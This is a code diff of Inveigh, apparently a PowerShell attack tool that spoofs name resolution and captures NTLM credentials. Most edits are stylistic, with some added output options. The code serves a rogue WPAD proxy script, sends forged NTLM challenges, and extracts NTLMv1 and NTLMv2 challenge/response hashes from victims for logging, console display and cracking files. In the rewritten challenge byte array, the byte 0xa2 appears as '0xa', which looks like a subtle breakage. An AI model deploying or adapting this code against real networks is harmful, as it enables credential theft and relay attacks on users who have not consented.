-        $inveigh.status_queue.add("HTTP/HTTPS Directory = $HTTPDir")|Out-Null
+        $inveigh.status_queue.Add("HTTP/HTTPS Directory = $HTTPDir")  > $null
 
         if($HTTPDefaultFile)
         {
-            $inveigh.status_queue.add("HTTP/HTTPS Default Response File = $HTTPDefaultFile")|Out-Null
+            $inveigh.status_queue.Add("HTTP/HTTPS Default Response File = $HTTPDefaultFile")  > $null
         }
 
         if($HTTPDefaultEXE)
         {
-            $inveigh.status_queue.add("HTTP/HTTPS Default Response Executable = $HTTPDefaultEXE")|Out-Null
+            $inveigh.status_queue.Add("HTTP/HTTPS Default Response Executable = $HTTPDefaultEXE")  > $null
         }
+
     }
 
     if($HTTPResponse)
     {
-        $inveigh.status_queue.add("HTTP/HTTPS Custom Response Enabled")|Out-Null
+        $inveigh.status_queue.Add("HTTP/HTTPS Custom Response Enabled")  > $null
     }
 
     if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic')
     {
-        $inveigh.status_queue.add("Basic Authentication Realm = $HTTPBasicRealm")|Out-Null
+        $inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm")  > $null
     }
 
     if($WPADIP -and $WPADPort)
     {
-        $inveigh.status_queue.add("WPAD = $WPADIP`:$WPADPort")|Out-Null
+        $inveigh.status_queue.Add("WPAD Response Enabled")  > $null
+        $inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort")  > $null
 
         if($WPADDirectHosts)
         {
@@ -587,112 +641,175 @@ if($inveigh.HTTP -or $inveigh.HTTPS)
             }
 
             $inveigh.WPAD_response = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
-            $inveigh.status_queue.add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",")|Out-Null
+            $inveigh.status_queue.Add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",")  > $null
         }
         else
         {
             $inveigh.WPAD_response = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
         }
+
     }
     elseif($WPADResponse -and !$WPADIP -and !$WPADPort)
     {
-        $inveigh.status_queue.add("WPAD Custom Response Enabled")|Out-Null
+        $inveigh.status_queue.Add("WPAD Custom Response Enabled")  > $null
         $inveigh.WPAD_response = $WPADResponse
+    }
+    else
+    {
+        if($WPADEmptyFile -eq 'Y')
+        {
+            $inveigh.status_queue.Add("WPAD Default Response Enabled")  > $null
+            $inveigh.WPAD_response = "function FindProxyForURL(url,host){return `"DIRECT`";}"
+        }
     }
 
     if($Challenge)
     {
-        $inveigh.status_queue.add("NTLM Challenge = $Challenge")|Out-Null
+        $inveigh.status_queue.Add("NTLM Challenge = $Challenge")  > $null
     }
 
 }
 
-if($MachineAccounts -eq 'n')
+if($MachineAccounts -eq 'N')
 {
-    $inveigh.status_queue.add("Ignoring Machine Accounts")|Out-Null
-}
-
-if($ConsoleOutput -eq 'y')
-{
-    $inveigh.status_queue.add("Real Time Console Output Enabled")|Out-Null
-    $inveigh.console_output = $true
+    $inveigh.status_queue.Add("Ignoring Machine Accounts")  > $null
+    $inveigh.machine_accounts = $false
 }
 else
 {
+    $inveigh.machine_accounts = $true
+}
+
+if($ConsoleOutput -eq 'Y')
+{
+    $inveigh.status_queue.Add("Real Time Console Output Enabled")  > $null
+    $inveigh.console_output = $true
+
+    if($ConsoleStatus -eq 1)
+    {
+        $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minute")  > $null
+    }
+    elseif($ConsoleStatus -gt 1)
+    {
+        $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minutes")  > $null
+    }
+
+}
+else
+{
+
     if($inveigh.tool -eq 1)
     {
-        $inveigh.status_queue.add("Real Time Console Output Disabled Due To External Tool Selection")|Out-Null
+        $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection")  > $null
     }
     else
     {
-        $inveigh.status_queue.add("Real Time Console Output Disabled")|Out-Null
+        $inveigh.status_queue.Add("Real Time Console Output Disabled")  > $null
     }
+
 }
 
-if($FileOutput -eq 'y')
+if($ConsoleUnique -eq 'Y')
 {
-    $inveigh.status_queue.add("Real Time File Output Enabled")|Out-Null
-    $inveigh.status_queue.add("Output Directory = $output_directory")|Out-Null
+    $inveigh.console_unique = $true
+}
+else
+{
+    $inveigh.console_unique = $false
+}
+
+if($FileOutput -eq 'Y')
+{
+    $inveigh.status_queue.Add("Real Time File Output Enabled")  > $null
+    $inveigh.status_queue.Add("Output Directory = $output_directory")  > $null
     $inveigh.file_output = $true
 }
 else
 {
-    $inveigh.status_queue.add("Real Time File Output Disabled")|Out-Null
+    $inveigh.status_queue.Add("Real Time File Output Disabled")  > $null
+}
+
+if($FileUnique -eq 'Y')
+{
+    $inveigh.file_unique = $true
+}
+else
+{
+    $inveigh.file_unique = $false
 }
 
 if($RunTime -eq 1)
 {
-    $inveigh.status_queue.add("Run Time = $RunTime Minute")|Out-Null
+    $inveigh.status_queue.Add("Run Time = $RunTime Minute")  > $null
 }
 elseif($RunTime -gt 1)
 {
-    $inveigh.status_queue.add("Run Time = $RunTime Minutes")|Out-Null
+    $inveigh.status_queue.Add("Run Time = $RunTime Minutes")  > $null
 }
 
-if($SMBRelay -eq 'n')
+if($SMBRelay -eq 'N')
 {
-    if($ShowHelp -eq 'y')
+
+    if($ShowHelp -eq 'Y')
     {
-        $inveigh.status_queue.add("Use Get-Command -Noun Inveigh* to show available functions")|Out-Null
-        $inveigh.status_queue.add("Run Stop-Inveigh to stop Inveigh")|Out-Null
+        $inveigh.status_queue.Add("Use Get-Command -Noun Inveigh* to show available functions")  > $null
+        $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh")  > $null
         
         if($inveigh.console_output)
         {
-            $inveigh.status_queue.add("Press any key to stop real time console output")|Out-Null
+            $inveigh.status_queue.Add("Press any key to stop real time console output")  > $null
         }
+
     }
 
     if($inveigh.status_output)
     {
+
         while($inveigh.status_queue.Count -gt 0)
         {
+
             if($inveigh.output_stream_only)
             {
-                write-output($inveigh.status_queue[0] + $inveigh.newline)
+                Write-Output($inveigh.status_queue[0] + $inveigh.newline)
                 $inveigh.status_queue.RemoveRange(0,1)
             }
             else
             {
+
                 switch ($inveigh.status_queue[0])
                 {
+
                     "Run Stop-Inveigh to stop Inveigh"
                     {
-                        write-warning($inveigh.status_queue[0])
+                        Write-Warning($inveigh.status_queue[0])
                         $inveigh.status_queue.RemoveRange(0,1)
                     }
+
                     default
                     {
-                        write-output($inveigh.status_queue[0])
+                        Write-Output($inveigh.status_queue[0])
                         $inveigh.status_queue.RemoveRange(0,1)
                     }
+
                 }
+
             }
+
         }
+
     }
 }
 else
 {
-    Invoke-InveighRelay -HTTP $HTTP -HTTPS $HTTPS -HTTPSCertAppID $HTTPSCertAppID -HTTPSCertThumbprint $HTTPSCertThumbprint -WPADAuth $WPADAuth -SMBRelayTarget $SMBRelayTarget -SMBRelayUsernames $SMBRelayUsernames -SMBRelayAutoDisable $SMBRelayAutoDisable -SMBRelayNetworkTimeout $SMBRelayNetworkTimeout -MachineAccounts $MachineAccounts -SMBRelayCommand $SMBRelayCommand -Tool $Tool -ShowHelp $ShowHelp 
+    try
+    {
+        Invoke-InveighRelay -HTTP $HTTP -HTTPS $HTTPS -HTTPSCertAppID $HTTPSCertAppID -HTTPSCertThumbprint $HTTPSCertThumbprint -WPADAuth $WPADAuth -SMBRelayTarget $SMBRelayTarget -SMBRelayUsernames $SMBRelayUsernames -SMBRelayAutoDisable $SMBRelayAutoDisable -SMBRelayNetworkTimeout $SMBRelayNetworkTimeout -SMBRelayCommand $SMBRelayCommand -Tool $Tool -ShowHelp $ShowHelp 
+    }
+    catch
+    {
+        $inveigh.running = $false        
+        throw "Invoke-InveighRelay is not loaded"
+    }
 }
 
 # Begin ScriptBlocks
@@ -700,33 +817,33 @@ else
 # Shared Basic Functions ScriptBlock
 $shared_basic_functions_scriptblock =
 {
-    Function DataToUInt16($field)
+    function DataToUInt16($field)
     {
 	   [Array]::Reverse($field)
-	   return [BitConverter]::ToUInt16($field,0)
+	   return [System.BitConverter]::ToUInt16($field,0)
     }
 
-    Function DataToUInt32($field)
+    function DataToUInt32($field)
     {
 	   [Array]::Reverse($field)
-	   return [BitConverter]::ToUInt32($field,0)
+	   return [System.BitConverter]::ToUInt32($field,0)
     }
 
-    Function DataLength
+    function DataLength
     {
-        param ([int]$length_start,[byte[]]$string_extract_data)
+        param ([Int]$length_start,[Byte[]]$string_extract_data)
 
         $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0)
         return $string_length
     }
 
-    Function DataToString
+    function DataToString
     {
-        param ([int]$string_length,[int]$string2_length,[int]$string3_length,[int]$string_start,[byte[]]$string_extract_data)
+        param ([Int]$string_length,[Int]$string2_length,[Int]$string3_length,[Int]$string_start,[Byte[]]$string_extract_data)
 
-        $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length-1)])
+        $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length - 1)])
         $string_data = $string_data -replace "-00",""
-        $string_data = $string_data.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+        $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         $string_extract = New-Object System.String ($string_data,0,$string_data.Length)
         return $string_extract
     }
@@ -735,9 +852,10 @@ $shared_basic_functions_scriptblock =
 # SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response
 $SMB_NTLM_functions_scriptblock =
 {
-    Function SMBNTLMChallenge
+
+    function SMBNTLMChallenge
     {
-        param ([byte[]]$payload_bytes)
+        param ([Byte[]]$payload_bytes)
 
         $payload = [System.BitConverter]::ToString($payload_bytes)
         $payload = $payload -replace "-",""
@@ -751,9 +869,9 @@ $SMB_NTLM_functions_scriptblock =
         return $NTLM_challenge
     }
 
-    Function SMBNTLMResponse
+    function SMBNTLMResponse
     {
-        param ([byte[]]$payload_bytes)
+        param ([Byte[]]$payload_bytes)
 
         $payload = [System.BitConverter]::ToString($payload_bytes)
         $payload = $payload -replace "-",""
@@ -769,35 +887,47 @@ $SMB_NTLM_functions_scriptblock =
             {
                 $NTLM_length = DataLength ($NTLM_bytes_index + 20) $payload_bytes
                 $NTLM_offset = $payload_bytes[($NTLM_bytes_index + 24)]
-
                 $NTLM_domain_length = DataLength ($NTLM_bytes_index + 28) $payload_bytes
                 $NTLM_domain_offset = DataLength ($NTLM_bytes_index + 32) $payload_bytes
                 $NTLM_domain_string = DataToString $NTLM_domain_length 0 0 ($NTLM_bytes_index + $NTLM_domain_offset) $payload_bytes
-
                 $NTLM_user_length = DataLength ($NTLM_bytes_index + 36) $payload_bytes
                 $NTLM_user_string = DataToString $NTLM_user_length $NTLM_domain_length 0 ($NTLM_bytes_index + $NTLM_domain_offset) $payload_bytes
-
                 $NTLM_host_length = DataLength ($NTLM_bytes_index + 44) $payload_bytes
                 $NTLM_host_string = DataToString $NTLM_host_length $NTLM_user_length $NTLM_domain_length ($NTLM_bytes_index + $NTLM_domain_offset) $payload_bytes
 
-                if(([BitConverter]::ToString($payload_bytes[($NTLM_bytes_index + $LM_offset)..($NTLM_bytes_index + $LM_offset + $LM_length - 1)]) -replace "-","") -eq ("00" * $LM_length))
+                if(([System.BitConverter]::ToString($payload_bytes[($NTLM_bytes_index + $LM_offset)..($NTLM_bytes_index + $LM_offset + $LM_length - 1)]) -replace "-","") -eq ("00" * $LM_length))
                 {
                     $NTLMv2_response = [System.BitConverter]::ToString($payload_bytes[($NTLM_bytes_index + $NTLM_offset)..($NTLM_bytes_index + $NTLM_offset + $NTLM_length - 1)]) -replace "-",""
                     $NTLMv2_response = $NTLMv2_response.Insert(32,':')
-                    $NTLMv2_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLMv2_response
+                    $NTLMv2_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLMv2_response       
 
-                    if(($source_IP -ne $IP) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $NTLM_user_string.EndsWith('$')))))
+                    if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$'))))
                     {      
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")])   
-                        $inveigh.NTLMv2_file_queue.add($NTLMv2_hash)
-                        $inveigh.NTLMv2_list.add($NTLMv2_hash)
-                        $inveigh.console_queue.add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv2_hash")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")])   
+                        $inveigh.NTLMv2_list.Add($NTLMv2_hash)
 
-                        if($inveigh.file_output)
+                        if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))
                         {
-                            $inveigh.console_queue.add("SMB NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+                            $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv2_hash")
                         }
+                        else
+                        {
+                            $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string) for $NTLM_domain_string\$NTLM_user_string - not unique")
+                        }
+
+                        if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
+                        {
+                            $inveigh.NTLMv2_file_queue.Add($NTLMv2_hash)
+                            $inveigh.console_queue.Add("SMB NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+                        }
+
+                        if($inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")
+                        {
+                            $inveigh.NTLMv2_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string")
+                        }
+
                     }
+
                 }
                 else
                 {
@@ -805,131 +935,108 @@ $SMB_NTLM_functions_scriptblock =
                     $NTLMv1_response = $NTLMv1_response.Insert(48,':')
                     $NTLMv1_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLMv1_response + ":" + $NTLM_challenge
 
-                    if(($source_IP -ne $IP) -and (($MachineAccounts -eq 'y') -or (($MachineAccounts -eq 'n') -and (-not $NTLM_user_string.EndsWith('$')))))
+                    if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$'))))
                     {    
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")])
-                        $inveigh.NTLMv1_file_queue.add($NTLMv1_hash)
-                        $inveigh.NTLMv1_list.add($NTLMv1_hash)
-                        $inveigh.console_queue.add("$(Get-Date -format 's') SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv1_hash")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")])
+                        $inveigh.NTLMv1_list.Add($NTLMv1_hash)
 
-                        if($inveigh.file_output)
+                        if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))
                         {
-                            $inveigh.console_queue.add("SMB NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+                            $inveigh.console_queue.Add("$(Get-Date -format 's') SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv1_hash")
                         }
+                        else
+                        {
+                            $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string) for $NTLM_domain_string\$NTLM_user_string - not unique")
+                        }
+
+                        if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")))
+                        {
+                            $inveigh.NTLMv1_file_queue.Add($NTLMv1_hash)
+                            $inveigh.console_queue.Add("SMB NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+                        }
+
+                        if($inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")
+                        {
+                            $inveigh.NTLMv1_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string")
+                        }
+                    
                     }
+
                 }
 
-                if (($inveigh.IP_capture_list -notcontains $source_IP) -and (-not $NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat) -and ($source_IP -ne $IP))
+                if ($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP)
                 {
-                    $inveigh.IP_capture_list += $source_IP
+                    $inveigh.IP_capture_list.Add($source_IP.IPAddressToString)
                 }
+
             }
+
         }
+
     }
+
 }
 
 # HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener
 $HTTP_scriptblock = 
 { 
-    param ($HTTPAuth,$HTTPBasicRealm,$MachineAccounts,$WPADAuth)
+    param ($HTTPAuth,$HTTPBasicRealm,$WPADAuth)
 
-    Function NTLMChallengeBase64
+    function NTLMChallengeBase64
     {
 
         $HTTP_timestamp = Get-Date
         $HTTP_timestamp = $HTTP_timestamp.ToFileTime()
-        $HTTP_timestamp = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_timestamp))
-        $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+        $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
+        $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
 
         if($inveigh.challenge)
         {
             $HTTP_challenge = $inveigh.challenge
             $HTTP_challenge_bytes = $inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
-            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         }
         else
         {
             $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
-            $HTTP_challenge = $HTTP_challenge_bytes -replace ' ', ''
-            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+            $HTTP_challenge = $HTTP_challenge_bytes -replace ' ',''
+            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         }
 
-        $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge) |Out-Null
+        $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge)  > $null
 
-        [byte[]]$HTTP_NTLM_bytes = (0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,0x00,0x00,0x00,0x05,0x82,0x89,0xa2)`
-            + $HTTP_challenge_bytes`
-            + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00)`
-            + (0x02,0x00,0x06,0x00,0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00)`
-            + (0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,0x00,0x68,0x00,0x6f,0x00)`
-            + (0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00)`
-            + (0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00)`
-            + $HTTP_timestamp`
-            + (0x00,0x00,0x00,0x00,0x0a,0x0a)
+        $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
+                           0x00,0x00,0x00,0x05,0x82,0x89,0xa +
+                           $HTTP_challenge_bytes +
+                           0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
+                           0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
+                           0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
+                           0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
+                           0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
+                           0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
+                           0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
+                           0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
+                           0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
+                           $HTTP_timestamp +
+                           0x00,0x00,0x00,0x00,0x0a,0x0a
 
         $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
         $NTLM = 'NTLM ' + $NTLM_challenge_base64
         $NTLM_challenge = $HTTP_challenge
         
-        Return $NTLM
-
+        return $NTLM
     }
+
+    $HTTP_raw_url_output = $true
     
     while($inveigh.running)
     {
         $inveigh.context = $inveigh.HTTP_listener.GetContext() 
         $inveigh.request = $inveigh.context.Request
         $inveigh.response = $inveigh.context.Response
-
-        if($inveigh.HTTP_directory -and $inveigh.HTTP_default_EXE -and ($inveigh.request.RawUrl -like '*.exe') -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE)) -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)))
-        {
-            [byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE))
-        }
-        elseif($inveigh.HTTP_directory)
-        {
-            if(($inveigh.HTTP_default_file) -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) -and ($inveigh.request.RawUrl -notmatch '/wpad.dat'))
-            {
-                [byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))
-            }
-            elseif(($inveigh.HTTP_default_file) -and ($inveigh.request.RawUrl -eq '/') -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)))
-            {
-                [byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))
-            }
-            elseif(($inveigh.WPAD_response) -and ($inveigh.request.RawUrl -match '/wpad.dat'))
-            {
-                [byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.WPAD_response)
-            }
-            else 
-            {
-                if(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))
-                {
-                    [byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))
-                }
-                else
-                {
-                    [byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.HTTP_response)
-                }
-            }
-        }
-        else
-        {
-            if($inveigh.HTTP_response)
-            {
-                $inveigh.message = $inveigh.HTTP_response
-            }
-            elseif($inveigh.request.RawUrl -match '/wpad.dat')
-            {
-                $inveigh.message = $inveigh.WPAD_response
-            }
-            else
-            {
-                $inveigh.message = ''
-            }
-
-            [byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message)
-        }
-
         $NTLM = 'NTLM'
         $NTLM_auth = $false
+        $Basic_auth = $false
         
         if($inveigh.request.IsSecureConnection)
         {
@@ -940,7 +1047,7 @@ $HTTP_scriptblock =
             $HTTP_type = "HTTP"
         }
         
-        if(($inveigh.request.RawUrl -match '/wpad.dat') -and ($WPADAuth -eq 'Anonymous'))
+        if($inveigh.request.RawUrl -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')
         {
             $inveigh.response.StatusCode = 200
         }
@@ -949,18 +1056,33 @@ $HTTP_scriptblock =
             $inveigh.response.StatusCode = 401
         }
 
-        if (!$inveigh.request.headers["Authorization"])
+        $HTTP_request_time = Get-Date -format 's'
+
+        if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $inveigh.request.RemoteEndpoint.Address -eq $HTTP_request_remote_endpoint_old)
         {
-            $inveigh.console_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)
-            $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)])
+            $HTTP_raw_url_output = $false
         }
+        else
+        {
+            $HTTP_raw_url_output = $true
+        }
+         
+        if(!$inveigh.request.headers["Authorization"] -and $inveigh.HTTP_listener.IsListening -and $HTTP_raw_url_output)
+        {
+            $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)
+            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)])
+        }
+
+        $HTTP_request_raw_url_old = $inveigh.request.RawUrl
+        $HTTP_request_remote_endpoint_old = $inveigh.request.RemoteEndpoint.Address
+        $HTTP_request_time_old = $HTTP_request_time
             
-        [string]$authentication_header = $inveigh.request.headers.getvalues('Authorization')
+        [String] $authentication_header = $inveigh.request.headers.GetValues('Authorization')
         
-        if($authentication_header.startswith('NTLM '))
+        if($authentication_header.StartsWith('NTLM '))
         {
             $authentication_header = $authentication_header -replace 'NTLM ',''
-            [byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
+            [Byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
             $inveigh.response.StatusCode = 401
             
             if($HTTP_request_bytes[8] -eq 1)
@@ -975,10 +1097,9 @@ $HTTP_scriptblock =
                 $HTTP_NTLM_length = DataLength 22 $HTTP_request_bytes
                 $HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_bytes
                 $HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_bytes
-                
-                [string]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*'
+                [String] $NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*'
                 $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
-                $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(","))+1)
+                $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
                        
                 if($HTTP_NTLM_domain_length -eq 0)
                 {
